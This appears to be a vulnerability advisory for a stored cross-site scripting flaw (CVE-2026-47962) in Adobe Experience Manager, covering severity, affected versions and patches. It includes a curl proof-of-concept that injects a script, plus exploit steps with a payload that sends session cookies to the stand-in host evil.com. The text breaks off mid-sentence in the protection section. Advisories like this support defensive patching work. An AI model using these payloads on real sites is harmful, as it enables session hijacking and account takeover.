Adobe Experience Manager, Stored XSS, CVE-2026-47962 (Medium) -DC-Jun2026-320

By /

Listen to this Post

CVE-2026-47962 – A stored cross-site scripting (XSS) vulnerability in Adobe Experience Manager (AEM) allows a low‑privileged attacker to inject arbitrary JavaScript into vulnerable form fields. The injected payload is permanently stored on the server and executed in the browser of any victim who later views the compromised page. The attack requires no special network access (remote, low complexity) and only low‑level privileges (e.g., a contributor or author account). The victim must interact with the malicious page (user interaction required). Because the script runs in the context of the victim’s session, it can steal session cookies, perform actions on behalf of the user, or deface the page. The scope is changed, meaning the vulnerable component (the form field) and the impacted component (the victim’s browser) are different, increasing the potential for lateral movement. The flaw is rooted in improper neutralization of input during web page generation (CWE‑79). Versions 6.5.24, LTS SP1, 2026.04, and all earlier releases are affected. Adobe patched the issue in its June 2026 security update (APSB26‑56). No public exploit or technical details are available as of the disclosure date, but the vulnerability is considered easy to exploit if a low‑privileged account can be obtained. The CVSSv3 base score is 5.4 (MEDIUM) with vector CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N.

DailyCVE Form:

Platform: Adobe Experience Manager
Version: 6.5.24 & earlier
Vulnerability: Stored Cross-Site Scripting
Severity: Medium
date: 2026-06-09

Prediction: Patch June 10

What Undercode Say:

Check currently installed AEM version
cat /path/to/aem/cq-version.properties | grep "product.version"
Search for unsanitized form fields in content
find /aem/crx -name ".jsp" -exec grep -l "request.getParameter" {} \;
Simple PoC payload (manual injection)
curl -X POST -d "comment=<script>alert('XSS')</script>" \
-H "Cookie: JSESSIONID=..." \
https://target-aem.com/content/forms/submit

Exploit:

1. Attacker authenticates with low‑privileged credentials (e.g., `contributor`).

  1. Identifies an AEM form field that does not sanitize user input (e.g., a comment box or profile field).
  2. Injects a malicious script, for example <script>document.location='https://evil.com?cookie='+document.cookie</script>, into the field.
  3. Submits the form; the payload is stored in the repository.
  4. Victim navigates to the affected page (e.g., a forum post or user profile).
  5. The script executes in the victim’s browser, stealing their session or performing unauthorized actions.

Protection:

  • Upgrade AEM to version 6.5.25, 2026.05, or a later patched release (APSB26‑56).
  • Enable the AEM built‑in XSS protection filter (/libs/granite/security/content/security/config.xml).
  • Apply a Web Application Firewall (WAF) rule to block `
    Scroll to Top